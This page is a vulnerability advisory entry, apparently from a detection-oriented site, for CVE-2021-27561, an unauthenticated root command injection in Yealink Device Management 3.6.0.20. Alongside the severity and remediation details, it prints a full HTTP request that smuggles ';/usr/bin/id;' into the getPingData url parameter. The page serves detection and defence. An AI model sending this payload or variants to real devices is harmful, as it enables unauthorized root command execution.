🔙 목록으로 돌아가기

CVE-2021-27561: YeaLink DM 3.6.0.20 - Remote Command Injection

TitleYeaLink DM 3.6.0.20 - Remote Command Injection
Authorshifacyclewala,hackergautam
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
RemediationUpdate to the latest firmware version provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94106
CVE IDCVE-2021-27561
CWE IDCWE-78
Tags cve2021 cve rce yealink mirai kev vkev vuln

🔍 Vulnerability Description

Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.

🌐 HTTP Request

GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-27561.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-27561.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A